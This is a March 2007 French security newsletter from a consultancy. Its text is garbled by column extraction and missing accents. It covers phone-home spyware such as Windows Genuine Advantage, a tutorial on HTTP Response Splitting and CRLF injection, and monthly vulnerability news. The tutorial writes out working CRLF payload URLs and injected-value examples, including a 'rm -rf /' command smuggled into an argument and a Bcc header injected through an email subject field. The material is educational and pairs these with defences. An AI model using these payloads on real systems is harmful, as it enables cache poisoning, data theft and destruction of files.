Actu Secu Mars2007

LACTU SCU 12 MARS 2
00 7
Numro 12 : le chiffre magique...
Il y a un an, je rdigeais mon dito, pour En ce qui concerne notre approche du Cette prise de conscience sera salvatrice
le premier numro de notre newsletter. secteur, il me semble que le contexte a pour le domaine de la scurit informa-
Ma volont tait claire : produire un volu depuis lanne dernire : en effet, tique : en effet, cest en ralisant quel
document de qualit, qui traiterait de l les prospects que nous rencontrons au- point ce domaine mrite une approche
informatique de manire objective et jourdhui semblent plus prudents, plus particulire et des solutions spcifiques
abordable pour la plupart de nos interlo- rceptifs lgard de nos dmarches que nous pourrons enfin rpondre aux
cuteurs. itratives et tales dans le temps. Il attentes de nos clients et de leurs direc-
Un an plus tard, je tiens tout particuli- semble fini le temps des audits masto- tions gnrales.
rement remercier mes collaborateurs dontes, des logiciels usine gaz cen- Pour ce numro anniversaire, il sem-
pour leurs participations actives la ss tout faire, parfaitement, en mode ble que le numro 12 occupe une place
ralisation de ce petit magazine, et tout plug and play . particulire ce mois-ci : 12 vulnrabili-
particulirement l'un d'entre eux, qui se ts Microsoft, 12 candidats la prsi-
reconnatra. En effet, je peux tmoigner dentielle, 12 numros de lactu-scu...
de leurs motivations, mois aprs mois, Faut-il y voir un quelconque prsage, un
pour identifier des thmes, des pistes de destin exceptionnel pour notre newslet-
recherches, des schmas, des photos, ter ? Nous le souhaitons tous ici !
etc. Le dernier numro a t tlcharg
Je vous laisse dsormais parcourir ce
215 fois sur notre site web !
numro, en esprant secrtement que
Pas mal pour une newsletter spcialise vous serez toujours plus nombreux
qui ne bnficie d'aucune publicit... nous tlcharger. Bonne lecture !
Enfin bref, cessons l l'autosatisfaction, Marc Behar
bien mrite nanmoins.
Fvrier 2007
Nombre de bulletins Microsoft : 12
Nombre dexploits dangereux : 17
Nombre de bulletins XMCO : 142
Top 5 des virus

WWW.XMCOPARTNERS.COM
1. HckPk : 50,3%
2, Netsky : 15,1%
3, Mytob : 12,5%
4, Zafi : 4,8%
5, Sality : 3,8%
Dossier........................................................................................2 Attaques et alertes majeures............................................10

Prsentation des logiciels baptiss Phone Home Description et analyse des attaques les plus importantes du mois.
Etat de lart ..................................................................................5 Outils Libres.......................................................................14

Prsentation et analyse dun type dattaque applicatif : lInjection CRLF Dcouvrez les outils les plus efficaces.
(HTTP Response Splitting)
XMCO Partners - 2007 [1]

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
Des logiciels espions sur
LACTU SCU Mars 2007
votre ordinateur?
LES PHONE HOME Dans cet article, nous vous
prsentons une forme de lo-
giciels espions dont la plu-
part dentre vous ne soup-
onnent mme pas lexis-
tence. Une grande partie des
internautes commence pren-
dre conscience du danger des
virus, des malware et des
spyware qui sont diffuss
sur Internet dans le but
dattaquer votre ordinateur
et de rcuprer vos donnes
sensibles. Dautres espions
rsident aussi continuelle-
ment sur votre ordinateur
sans mme que vous ne vous
en doutiez.
Quels sont-ils ? Do vien-
nent-ils ? Rponses et pr-
sentation des logiciels
Phone Home.
XMCO | Partners
Les Phone Home : un logiciel espion sur votre ordinateur

Dfinition Mode de diffusion
Phone Home est une expression employe pour la pre- Comment ces donnes sont-elles envoyes? La transmis-
mire fois, il y a quelques annes, dans le film E.T de sion des informations diffuses par ce genre de logiciels est
Spielberg. Ce terme dsigne, aujourdhui , un type de logi- totalement transparente pour la victime. Une fois connect
ciel dapparence lgitime, qui va discrtement communiquer sur Internet, le logiciel, lanc gnralement au dmarrage
avec un serveur distant dans le but de rcolter des informa- de la machine, va excuter certaines commandes afin de
tions propres aux utilisateurs. rcuprer diffrentes donnes qui seront envoyes un
Les diteurs prtendent utiliser cette fonctionnalit dans un serveur tiers.
but purement pratique savoir: permettre une assistance en Peu dinternautes ont dj pris la peine dtudier les pa-
cas de problme ou transmettre une clef dautorisation. quets qui sortent de leur ordinateurs mais vous seriez cer-
Mais lobjectif rel est tout autre. Il rside dans lobtention tainement surpris par le trafic qui y transite. Aucune crainte
dinformations pertinentes qui contribueront analyser le avoir, la plupart des informations sont lgitimes. Seule-
comportement de lutilisateur afin de mieux comprendre ses ment quelques donnes chiffres y sont jointes. Le but est
besoins et ses habitudes. de renvoyer un simple paquet pratiquement invisible aux
yeux des utilisateurs les plus avertis.
Lexemple Microsoft
WGA : une simple mise jour de scurit?
Le cas de Microsoft, largement relay dans la presse sp-

cialise de lpoque, constitue laffaire de Phone Homing
la plus connue.
Vous avez certainement entendu parler de Windows Ge-
nuine Advantage (ou WGA). Ce logiciel de scurit: dispo-
nible depuis juin 2006, vrifie la lgitimit de votre version
de Windows (dans le cas inverse, vous installez des logi-
ciels sans mme en connatre le nom!). En dautres termes,

LACTU SCU Mars 2007 il vous donne le droit daccder au tlchargement de cer- authentification et non chaque dmarrage de lordina-
tains logiciels et de certaines mises jour de scurit teur
Daprs le gant bleu, WGA "ne recueille et n'envoie au-
Ce logiciel, considr comme une mise jour de scurit cune information qui pourrait tre utilise pour identi-
par Microsoft, nest pas seulement un outil dauthentifica- fier ou contacter un utilisateur" .
tion. En effet, il inclut aussi un logiciel espion qui se con-
necte chaque dmarrage. Il envoie, votre insu, des in- Lorsque Microsoft prit conscience de leffet dvastateur que
formations la maison mre de Microsoft. cette action en justice pourrait avoir sur son image de mar-
Intressant... que, il dcida de modifier la configuration de ce logiciel ainsi
que le texte de la licence. Dsormais, le logiciel ne se con-
nectera plus qu chaque mise jour de scurit, et ce afin
de dsactiver peu peu le service.
Les informations envoyes sont premire vue inintres-
santes mais que diriez-vous si votre nom, vos logiciels pira-
ts, votre adresse IP ainsi que le nom de votre fournisseur
daccs taient envoys puis communiqus aux diteurs et
aux services de Police ?
Que deviennent donc ces informations une fois stockes sur
les serveurs de Microsoft ? Le mystre reste entier.
Mars 2007 : aucun changement lhorizon...
Nouveau rebondissement dans cette affaire, le 6 Mars

2007, des journalistes allemands du Heise Security [1]
dcidrent de vrifier les promesses de Microsoft. A laide
de Wireshark,anciennement appel Ethreal et outil prfr
des pirates en herbe, ils analysrent les donnes envoyes
par un systme Windows. Windows Update tente dinstaller
la dernire version de WGA et propose lutilisateur de
confirmer linstallation. Jusquici tout va bien Cependant,
ds lors que lon annule la procdure, le syndrome es-
pion rapparat et Microsoft est immdiatement averti de
votre action
Rsum des pisodes prcdents: avril 2006 le

dbut de laffaire WGA
Revenons en avril 2006. Le scandale clate au grand jour.

Un utilisateur saperoit que des donnes tranges sont
mises par son ordinateur. Des outils dcoute rseau d-
montrent bien que WGA envoie priodiquement des infor-
mations certains serveurs contrls par Microsoft.
Le programme fait alors lobjet dune procdure en justice.

Le plaignant se base sur le fait que WGA doit tre assimil
un spyware, logiciels espions strictement interdits aux Etat-
Unis. La plainte concerne une violation de la lgislation an-
tispyware ainsi que des clauses de droit la consommation
en vigueur dans les tats de Californie et de Washington.
Un fichier XML partiellement chiffr est transmis. Il contient
Le plaignant exige alors des dommages et intrts d'un
une chane SusClientID ainsi que le type de systme
montant indtermin. Il demandera aussi obtenir le statut
utilis. De plus, un cookie nomm GUID est utilis pour
de "Class Action" (ou d'action collective).
Le logiciel de Microsoft s'avrera tre un spyware puissant

et bien rel. Il donne, en effet, des informations sur la confi-
guration d'un systme, la marque, le modle, les param-
tres rgionaux, les cls d'identification produit, l'identifiant
unique global (GUID), le nom, le numro de rvision du
Bios, ainsi que le numro de srie du disque dur. Il est int-
ressant de noter que tous ces lments sont rcuprs
quotidiennement.
Un texte avait bel et bien t prvu pour signaler cet

change dinformations, mais seulement lors de la premire

LACTU SCU Mars 2007 contacter le serveur distant. Microsoft serait alors en me-
INFO...
sure didentifier les ordinateurs qui refusent dinstaller les
mises jour.
Haut les mains, vous tes cerns !

WGA crack par un groupe
Quelques uns de nos chers lecteurs comprennent aujour- de pirates
dhui les messages qui arrivent, de temps autres, sur leur
cran en prcisant gentiment que leur version de Windows
XP nest pas lgitime? Vous tes victime d'une contre- Windows Genuine Advantage est un logiciel qui permet de
faon? vrifier la validit dune licence de Windows en analysant
la clef dun systme avec la base de donnes des licences
pirates.
Une fois lauthentification ralise, lutilisateur est autoris

tlcharger les mises jour ainsi que dautres outils
Windows.
Ennuyeux pour les utilisateurs illgaux de Windows...
Et bien dtrompez-vous, ce nest pas un virus comme la
plupart des internautes le pense mais bel et bien le rsultat Le groupe de pirates ETH0 sest rapidement pench sur le
dun contrle effectu par lagent espion problme et a dvelopp un crack qui modifie plusieurs
fichiers legitcheckcontrol.dll, WgaLogon.dll,
Wgatray.exe. Un fichier .bat ralise lopration en
Dautres exemple chez de grands diteurs quelques secondes.
Itunes galement montr du doigt
Ce dernier est bien entendu disponible sur Internet.
Bien avant Microsoft, Apple avait aussi t la cible de criti-
ques au sujet de son logiciel Itunes.
Depuis la version 6.0.2 et lapparition du MiniStore, Apple
nouvelle a, durant quelques temps, aliment la rumeur de la
vous propose des publicits sur des artistes correspondant
Backdoor cre par la NSA pour espionner les citoyens
vos got musicaux.
amricains.
Comment arrivent-ils rester proches du domaine musical
que vous coutez? Peu de gens se posent ce genre de
questions Les paranoaques de la scurit, si!
Itunes rcupre des informations sur les chansons cou-
Conclusion
tes. Il renvoie ensuite votre profil au sige dApple qui
Faut-il entrer dans une psychose constante et analyser tous
adapte le contenu propos dans l Apple Store.
les flux qui sortent de votre ordinateur? Des socits pro-
Le problme, mis en vidence, reste le mme. Les informa-
posent dj ce genre de produits. Ces derniers vous aver-
tions ne sont pas obligatoirement critiques. Apple essaye
tissent ds quune connexion est tablie sur un serveur dis-
juste de servir au mieux ses clients. Le problme est que la
tant en prcisant: le nom du logiciel douteux et ladresse IP
socit de Steeve jobs ninforme pas ses clients de ces
du serveur cibl.
envois discrets
Ce phnomne nest pas anodin. Certains diteurs ont
Une solution: supprimer le MiniStore, configuration possi-
mme dpass des limites linstar de Sony et de son
ble dans les options dItunes (Hide Ministor dans le me-
rootkit (voir notre article dans lActu Scu n3) initialement
nu Edit).
utilis pour la gestion des droits musicaux. Or ce rootkit a
t exploit par le cheval de Troie Stinx-E dans le but de
compromettre certaines machines.
Du point de vue de la scurit, la confidentialit des don-

nes personnelles est donc remise en cause et bien que les WWW.XMCOPARTNERS.COM
Phone Home soient rapidement identifis, la mfiance
doit tre de mise
Bibliographie
[1] Article du journal Heise Security

http://www.heise-security.co.uk/news/86294
[2] Le cas Itunes

Zone Alarm utilis par la NSA !? http://blogs.zdnet.com/Apple/?p=75
Enfin, en janvier 2006, Zone Alarm avait galement attir [3] Suspicions sur le logiciel Zone Alarm
lattention dutilisateurs. La version 6.0 envoyait galement http://www.infoworld.com/article/06/01/13/73792_03OPcringl
des donnes chiffres quatre serveurs diffrents. Cette
ey_1.html

Les attaques HTTP Res-
LACTU SCU Mars 2007
ETAT DE LART ponse Splitting
Ce mois-ci, nous allons

vous dvoiler une autre
technique de piratage ap-
plicatif. Elle exploite
une faiblesse du proto-
cole HTTP.
Cette attaque, souvent
mconnue, doit srieuse-
ment tre prise au s-
rieux car elle touche une
vaste population de ser-
veurs web, de logiciels
et de proxies.
Nous tenterons de vous
prsenter clairement
cette attaque baptise
HTTP Response Splitting
(Sparation de requte
HTTP) via des exemples
concrets.
XMCO | Partners
Rappel
Fonctionnement dune requte/rponse du Si le serveur web hberge rellement la page demande, il
protocole HTTP vous renverra la rponse suivante :
Avant de nous lancer dans le dtail des techniques datta-

ques, rappelons quelques concepts du protocole HTTP. HTTP/1.1 200 OK
Vous pouvez passer au paragraphe suivant si vous tes un Date: Sat, 17 Mar 2007 16:31:52 GMT
connaisseur. Server: Apache/ProXad [Dec 3 2006 11:06:18]
Lorsque vous visitez certains sites, vous demandez au ser- X-Powered-By: PHP/4.4.3-dev
veur web de vous envoyer le contenu dune page en sou- Connection: close
mettant une url du type: Content-Type: text/html
http://www.site.com/index.php?menu=choix1
La requte envoye par votre navigateur web est constitue Chaque champs de lentte HTTP est dlimit par deux
de nombreuses informations (page demande, mthode caractres CR (Carriage Return \r ou Retour Chariot en
utilise, version du protocole HTTP, domaine, type de navi- franais) et LF (Line Feed qui indique qu'il y a lieu de passer
gateur utilis par le client, cookie de session si besoin est la ligne suivante: \n). Cette association de caractres
...). Dans la suite de cet article, les requtes envoyes par est considre par de nombreuses applications et de nom-
le client seront matrialises par un cadre rouge et les r- breux protocoles comme des dlimiteurs.
ponse du serveur par un cadre jaune. Lors du traitement, ds que cette suite de caractres est
identifie, le programme retourne simplement la ligne. Le
GET www.site.com/index.php?menu=choix1 HTTP/1.1 dernier champs dune requte HTTP est alors suivi de deux
Host: www.site.com entres CRLF pour indiquer la fin de l'entte et le dbut du
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; corps de la page.
rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2 Paros/3.2.13
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: http://www.site.com/
Cookie: BX=d0p8o6t2slsi8&b=3&s=17

LACTU SCU Mars 2007 Redirection cette attaque est denvoyer des requtes HTTP contenant
des caractres CR (0x0D en ASCII) et LF ( 0x0A en ASCII).
La redirection est dfinie par une fonction qui insre un Ces derniers vont induire en erreur les quipements qui
nouveau champs (Location) dans lentte HTTP afin dindi- traiteront la rponse du serveur.
quer au navigateur vers quelle page ce dernier va se diriger.
En dautres termes, le pirate va crer une longue url conte-
Petit exemple : Voici le code dune page PHP nomme nant des caractres spciaux. La rponse renvoye par le
redir.php qui accepte, en paramtre, un argument utilis serveur va tre scinde en deux par le proxy ou bien par le
pour dfinir lurl vers laquelle lutilisateur va tre redirig. navigateur qui est charg danalyser cette rponse.
<? Un exemple
header("Location:
http://www.xmcopartners.com/goto.php?id=" . Dans certains cas (en particulier pour les redirections), la
$_GET['id'] );
rponse du serveur va inclure l'url demande au sein du
?>"
paramtre Location. L'enjeu de la russite de l'attaque
se situe cet endroit prcis. Dautres paramtres peuvent
tre utiliss pour mener cette attaque. Nous tudierons,
Dans notre cas, nous essayons datteindre la page cependant, le cas prcis du paramtre Location.
/redir.php?id=menu du serveur xmcolabs. Reprenons notre requte :
Requte : http://www.xmcolabs.com/redir.php?id=menu http://www.xmcolabs.com/redirect.php?id=menu
En changeant la fin de cette url, avec linsertion de caract-

GET http://www.xmcolabs.com/redir.php?id=menu HTTP/1.1 res CR et LF (%0d%0a) et les champs d'une rponse (Con-
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
tent-Lenght, Content-Type), l'url, entre dans notre barre
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
d'adresse, sera du type :
Accept-Language: fr
UA-CPU: x86 http://www.xmcolabs.com/redir.php?id=menu%0d
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT %0aContent-Lenght:%200%0d%0a%0d%0a%20HTTP/1.
5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) 1%20200%20OK%0d%0aContent-Type:text/html%0d%
Host: www.xmcolabs.com 0aContent-Lengh:%207%0d%0a%0d%0a<html>Inje
Proxy-Connection: Keep-Alive
ction<html>
La requte envoye (que nous nommerons X) est donc

Rponse du serveur xmcolabs: une requte GET :
HTTP/1.1 302 Found GET

Date: Wed, 21 Mar 2007 16:41:52 GMT /index.php?menu=test%0d%0aContent-Lenght:%200%0d%0
Server: Apache/1.3.33 (Win32) PHP/4.3.10 aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0
X-Powered-By: PHP/4.3.10 d%0aContent-Lengh:%207%0d%0a%0d%0a<html>Injecti
Location: http://www.xmcopartners.com/goto.php?id=menu on<html> HTTP/1.1
Content-Type: text/html
Le serveur web devrait renvoyer thoriquement la rponse

Nous voyons, ici, que le code de la rponse est 302. Celui-
suivante qui inclut la majeure partie de notre requte dans
ci indique au navigateur que le contenu souhait est sur une
le champs location :
autre page. Lentte contient alors un champs Location qui
reprend le paramtre Menu de notre requte et le reco-

pie dans lurl vers laquelle nous sommes redirigs. HTTP/1.1 302 Found
Date: Wed, 21 Mar 2007 16:54:29 GMT
La rponse de ce serveur contient une partie de l'url que Server: Apache/1.3.33 (Win32) PHP/4.3.10
nous avons demande... Le serveur est donc potentielle- X-Powered-By: PHP/4.3.10
ment vulnrable.... Location: http://www.xmcopartners.com/goto.php?id=
menu%0d%0aContent-Lenght:%200%0d%0a%0d%0a%20H
TTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d
Lattaque HTTP Response Splitting %0aContent-Lengh:%207%0d%0a%0d%0a<html>Injection<
html>
Dfinition
Cette technique a t baptise HTTP Response Splitting .

Elle est galement appele injection CRLF, ne pas con-
fondre avec CSRF, lattaque que nous vous avons prsen-
te le mois dernier. Comme son nom lindique, le but de

LACTU SCU Mars 2007 Cependant, en traitant la demande du client (conversion des demanderont la page obtiendront donc une page mali-
caractres %0d%0a par un retour en ligne et %20 par un cieuse.
espace), le serveur ne vrifie pas les entres de lutilisateur
ni la prsence de caractres spciaux. Il traite la demande
normalement et retourne la ligne ds qu'il trouve les ca- Cross Site Scripting
ractres CRLF. La rponse va donc tre de la forme sui- Aprs lidentification dune telle faille, une autre possibilit
vante. est offerte lattaquant. En effet, maintenant quil est possi-
ble de modifier souhait le contenu de la seconde rponse
du serveur, il suffit dinjecter un code Javascript. Ce dernier
HTTP/1.1 302 Found
pourra forcer le navigateur du client renvoyer le cookie de
Date: Wed, 21 Mar 2007 16:54:29 GMT x session vers un serveur pirate.
Server: Apache/1.3.33 (Win32) PHP/4.3.10
X-Powered-By: PHP/4.3.10
Location: http://www.xmcopartners.com/goto.php?id= menu
Content-Length:0 Vol dinformations
Ce dernier cas est relativement difficile installer car il n-
HTTP/1.1 200 OK
Content-Type:text/html
cessite un timing prcis. Dans un cas idal, un pirate pour-
Content-Lengh:21 x rait manipuler et intercepter les donnes renvoyes par le
<html>Injection<html> serveur web vulnrable.
Content-Type: text/html Certains types de proxies optimisent leurs requtes en mu-
tualisant deux requtes destines un mme serveur web.
Si deux utilisateurs demandent deux pages du mme site
Le premier champs "Content-Lenght" a une valeur de 0. Le au mme moment, le proxy ntablit quune seule con-
navigateur ou proxy interprte cette donne comme la fin nexion. Une fois les donnes rcupres, il redistribue les
d'une premire rponse (rponse X ). La partie verte pages au bon utilisateur. Avec deux requtes envoyes par
constituera une seconde rponse ( X ). lattaquant, le vol dinformation est potentiellement imagina-
Au cas o le client enverrait une seconde requte au sein ble.
de la mme session HTTP (depuis la version 1.1), le navi-
gateur (ou proxy) considrera que la partie verte ( X )
correspond la rponse de cette nouvelle requte.
Cette rponse inclura la page HTML malicieuse que nous
avons inject (<html> Injection </html>).
INFO...
L'insertion de caractres CR et LF a donc forc le serveur
web renvoyer, son insu, deux rponses distinctes. De nombreuses applications encore vulnra-
Maintenant que la thorie de cette mthode d'attaque est bles
dtaille, voici une ide du genre de malversations qui peut Bien que cette faille de scurit soit
tre mene... relativement vieille (2004), les di-
teurs corrigent encore de telles vuln-
rabilits. 48 failles de scurit ont
Quels sont les objectifs de cette attaque? t dcouvertes lors des 3 dernire an-
nes or elles affectent les principaux
Cette attaque est utilise par les pirates dans plusieurs buts. logiciels du march : SAP, Oracle, Fo-
Les consquences diffrent en fonction de la cible. En effet, rums PHP, Squid, Tivoli, Lotus Notes,
en visant un proxy cache, l'url envoye pour attaquer un etc.
utilisateur ou pour attaquer directement le serveur web sera Sun est le dernier exemple en date. Au
diffrente. dbut du mois de Mars, une nouvelle ver-
Etudions les possibilits qui sont offertes (Cache Poison- sion du logiciel Websphere Application
ning, Cross Site Scripting, Cross-User Defacement). Server a t publie, corrigeant au pas-
sage une vulnrabilit de ce genre...
Lexploitation est donc toujours dac-
Cache Poisonning tualit...

Le Cache Poisonning consiste forcer un serveur mettre
dans son cache des donnes malicieuses qui seront par la Evolution du nombre de vulnrabilits "HTTP Response Splitting" identifis
depuis 2004
suite demandes par un autre client. 20
18
18
19
Reprenons l'exemple dcrit dans le paragraphe prcdent. 16
Imaginons que deux requtes soient envoyes dans une 14
12
mme session. Il est possible de forcer le serveur ren- 10
voyer deux rponses. La seconde contiendra le code HTML 8
9
dune page cre par le pirate. 6
Cette rponse verte peut aussi tre renvoye par le serveur 2 2

web vers un proxy. Ce dernier verra une requte lgitime 0
2004 2005 2006 2007

arrive en provenance du serveur web et stockera le conte-
nu de cette page dans son cache. Les prochains clients qui

LACTU SCU Mars 2007
LA PREUVE PAR LEXEMPLE...

Scnario dattaque dans le but dintercepter la rponse dune requte HTML destine un autre utili-
sateur. Cet exemple dcrit un scnario idal.
Etape 1: Des requtes sont envoyes au serveur web
Lattaquant envoie une requte X

malicieuse vers le serveur web.
La victime envoie en mme temps

une requte Y lgitime vers le serveur
web.
Lattaquant envoie une requte Z

lgitime vers le vers le serveur web.
Etape 2: Le serveur sacquitte des trois requtes par des rponses distinctes sans filtrer les enttes :
Une rponse x pour la requte X.
Une rponse y pour la requte Y.
Une rponse z pour la requte Z.
Etape 3: Le proxy intercepte toutes ces rponses et les distribue vers les clients en fonction de lordre darrive :
La rponse x est divise en deux

rponses X1 et X2.
X1 est destine lattaquant
X2 est destine la victime
Y est destine lattaquant
La dernire rponse Z est rejete.
Rsultat: lattaquant reoit la page qui tait destine la victime.

Les solutions Le site test est donc potentiellement vulnrable car il ren-
Comment parer dventuelles attaques? voie la rponse suivante et attribue le cookie HTTP_res-
ponse_splitting=YES.
La plupart des logiciels, serveurs web ou proxies ont dj
corrig cette faille de scurit. Vous retrouverez dailleurs la
liste des vulnrabilits CRLF corriges ladresse cite en Conclusion
rfrence.
Lattaque HTTP Response Splitting est une technique peu
Les mthodes sont relativement simples et peuvent facile- employe par les pirates car elle requiert un certains nom-
ment tre implmentes. Le premier conseil est de ne ja- bre de paramtres ainsi quun timing prcis. Il est nces-
mais faire confiance aux entres des utilisateurs. En analy- saire de connatre ce genre de problmes car ces derniers
sant correctement et en interdisant certains caractres sp- sont rencontrs par de nombreux proxies et de nombreux
ciaux dans chacune des entres fournies par le client, votre serveurs web. Des correctifs ont, certes, t publis mais
application fera face aux injections CRLF (caractres %0d les mcanismes de protection restent encore perfectibles.
%0a), aux attaques de Cross Site Scripting (caractres
<>) et aux injections SQL (,).
Le module mod_security prsent dans notre numro 8 Bibliographie
de lActu-Secu, permet justement de traiter correctement les
entres utilisateurs. Vulnrabilit dinjection CRLF corriges:
http://secunia.com/search/?search=response+splitting
Enfin, il est galement possible dinterdire tout caractre
CRLF contenu dans les entte de rponses http. White Paper de Amit Klein
http://www.packetstormsecurity.org/papers/general/whitepap
er_httpresponse.pdf
Mon application est-elle vulnrable?
INFO...
Il existe des moyens et des outils spcialiss dans la dtec-
tion de telles failles. Les scanners applicatifs sont dailleurs
efficaces dans ce domaine. Mais peut-on identifier simple-
ment de telles problmes avec un simple navigateur? La
rponse est oui!
La mthode a t rcemment propose par le gourou de ce Linjection de caractre CRLF utilise dans
type dattaque M. Amit Klein. dautres buts...
Lide est simple. Au lieu de tester lapplication avec une
requte excessivement longue, il suffit de dmontrer com- Les injections CRLF peuvent tre utili-
ment un nouvel entte usurp peut tre inject. Cette tech- ses dans de nombreux cas.
nique semble fonctionner 9 fois sur 10. Nous avons vu le fonctionnement applica-
tif d'un serveur web. Il est galement
Nous allons simplement tenter dinjecter un cookie avec la possible de soumettre de tels caractres
requte suivante: en entre de programme. Une application
vulnrable une injection CRLF et qui
http://www.xmcolabs.com/id=menu%0d%0aSet-Coo accepte des arguments comme "ls -a", se-
kie:%20HTTP_response_splitting%3dYES%0d%0aF rait berne par la commande suivante :
oo:%20bar ls -a File.txt<CR><LF>rm -rf /
Lurl qui nous intresse sera injecte au sein du paramtre L'application excuterait la commande
id= afin de forcer le serveur renvoyer la rponse suivan- "ls -a File.txt" puis "rm -rf" (suppres-
te: sion de tous les fichiers du rpertoire
courant).
Mme remarque pour certains sites web
HTTP/1.1 302 Found qui offrent la possibilit d'envoyer des
Date: Wed, 21 Mar 2007 18:00:03 GMT
courriers lectroniques sans en conna-
Server: Apache/1.3.33 (Win32) PHP/4.3.10
X-Powered-By: PHP/4.3.10
tre le destinataire via des formulai-
Location: http://www.xmcopartners.com/goto.php?id=menu res). En entrant dans le champs "Sujet"
Set-Cookie: HTTP_response_splitting=YES la ligne ci-dessous :
Foo: bar Subject: Offre d'emplois <CR><LF>Bcc:
xmco@xmcopartners.com
L'application va soumettre ces donnes
qui seront converties en un email SMTP
En utilisant une fonctionnalit des navigateurs (sous IE format. Les diffrents champs tant s-
Outils Option ConfidentialitAvanc), nous pour- pars par des caractres CRLF, une copie
rons savoir si nous recevons le cookie HTTP_response_s- cache sera discrtement envoye au pi-
plitting=YES. rate qui obtiendra donc l'email du des-
tinataire en question.

Tendance de lactivit mali-
LACTU SCU Mars 2007
cieuse dInternet :
LES ATTAQUES MAJEURES Ce mois de Fvrier a t

marqu par plusieurs
failles critiques mettant
en pril la scurit des
postes client mais aussi
des serveurs accessibles
sur Internet.
En effet, aprs une vul-

nrabilit critique dans
Google, Desktop, les ser-
veurs Solaris ainsi que
les serveurs Web Jboss
sont victimes dune
faille tonnante.
Explications
XMCO | Partners
Les vulnrabilits des postes clients Voici les deux captures:

Microsoft encore et toujours Lobjectif du pirate est dinciter un utilisateur visiter un site
malicieux qui utilisera un script pour bloquer lutilisateur au
sein dune matrice.
Les failles du mardi noir
Scnario dattaque :
A l'occasion de son mardi noir mensuel, pas moins de 12 Lutilisateur navigue sur un site Internet qui recommande de
failles de scurit ont t corriges par Microsoft. Les logi- vrifier si les comptes des utilisateurs de GMAIL nont pas
ciels phare du gant ont t mis jour: Internet Explorer, t pirats suite la publication dexploit 0day.
les logiciels de scurit (Defender, One Care) et Word
ainsi que des composants de Windows (Step-by-Step,
Shell, MFC).
Plusieurs vulnrabilits rsultaient derreurs gnres
par le traitement dobjet OLE malforms. Le but des
attaques est dinciter un utilisateur ouvrir un document
RTF contrefait.
Toutes ces failles ncessitaient lintervention de lutilisa-

teur et donc touchaient particulirement les postes
clients.
Internet Explorer : la cible privilgie des

attaques de Phishing
Une autre vulnrabilit a t publie la fin du mois

pour Internet Explorer 7. La fonction OnUnload pou-
vait tre dtourne de son utilisation normale afin
dempcher un utilisateur de quitter un site malicieux.
Une fois sur le site contrefait, toute adresse entre dans
le champs prvu cet effet renvoyait lutilisateur vers
une page cre par lattaquant.
Nous avons cr une maquette qui illustre ce principe.

LACTU SCU Mars 2007 Tout utilisateur consciencieux va immdiatement vrifier Ce genre de problme est souvent exploit pour voler des
lintgrit de son compte GMAIL. Le pirate qui exploite la donnes (cookie de session). Cependant, il est rarement le
vulnrabilit dInternet Explorer dirige la victime vers une vecteur dattaque qui permet de prendre le contrle de la
page GMAIL contrefaite sans que la victime ne sen rende machine cible.
compte car la barre dadresse correspond Or, ici, le serveur web vulnrable nest autre quun serveur
www.gmail.com. local.
Le scnario de lattaque serait donc le suivant:
-Le pirate doit inciter la victime suivre un lien
malicieux (par e-mail, messagerie instantane..)
-La victime clique sur le lien, le script est alors
excut.
-Une requte XmlHttpRequest est envoy Goo-
gle dans le but de rcuprer la signature (chane
de caractres qui permet de lancer des requtes
via Google Desktop).
-Une fois la signature rcupre, cette dernire va
tre utilise pour lancer les requtes aveugles au
logiciel.
-Enfin la victime est dirige derechef vers une
page lgitime afin de ne pas veiller de soupons.
Le script est lanc et renvoie le rsultat instantanment. La

Les donnes sont alors drobes et renvoyes latta-
victime ne peut pas prendre conscience du faut que son
quant. Cette vulnrabilit na pas t corrige par Microsoft.
poste est dsormais compromis.
Nous vous recommandons donc de fermer puis douvrir
nouveau votre navigateur avant de consulter un site sensi-
De son ct, le pirate utilise un proxy. Il voit ainsi passer
ble.
toutes les requtes lances par la victime. Il peut tout
moment modifier la configuration du logiciel, ajouter des
paramtres pour rechercher des types de fichiers et voir le
Google Desktop : le protg rsultats de ses recherches.
de Google critiqu Le script tablit une connexion entre le serveur de la victime
et le poste de lattaquant si bien quavec les outils adquats,
La socit Watchfire est mondialement le pirate peut prendre la main sur le logiciel.
connue pour ses whitespapers et son expertise dans le mi-
lieux de la scurit informatique. Elle a dmontr avec une
vido publie sur Internet comment un poste qui impl-
mente Google Desktop pouvait tre compromis. Google
Desktop est un logiciel qui permet dindexer le contenu de
son ordinateur pour effectuer, laide de linterface de Goo-
gle, des recherches de fichiers. Un onglet Desktop est
ainsi ajout la page daccueil du moteur de recherche.
Cette fonctionnalit utilise un serveur web local qui se char-
gera de trouver vos e-mails, vos rpertoires et vos fichiers
indexs.
Lorigine de la faille est une vulnrabilit de Cross Site

Scripting prsente dans le champs de recherche. Les argu-
ments passs la fonction under (qui permet de recher-
cher les documents dun rpertoire) ntaient pas contrls .
Ceci permettait dexcuter des scripts malicieux. La faille de
scurit tait dailleurs persistante si bien quaprs avoir Ici, par exemple, le pirate recherche les fichiers qui poss-
excut le script, toute recherche renvoyait le rsultat de ce
dent lextension .exe.
dernier.
Google a immdiatement corrig le problme. La dernire
version de Google Desktop nest donc plus vulnrable. Tou-
tes les informations relatives cette attaque sont dcrites
dans le white paper et la dmonstration vido disponible
ladresse suivante:
Une vido de dmonstration est disponible l'adresse

suivante :
http://download.watchfire.com/googledesktopdemo/index.ht
m
Un white paper est galement disponible :

http://download.watchfire.com/whitepapers/Overtaking-Goo
gle-Desktop.pdf

LACTU SCU Mars 2007 Les vulnrabilits des serveurs
Solaris, une vielle faille refait surface... Cette nouvelle a donc affol tous les responsables scurit
qui ont t forcs dappliquer rapidement le cor-
Nous vous en avons parl rapidement dans rectif propos par Sun ou bien de bloquer le
ldito du numro de Fvrier 2007, la faille port 23 afin de parer dventuelles attaques.
froot avait cr l'vnement de ce mois.
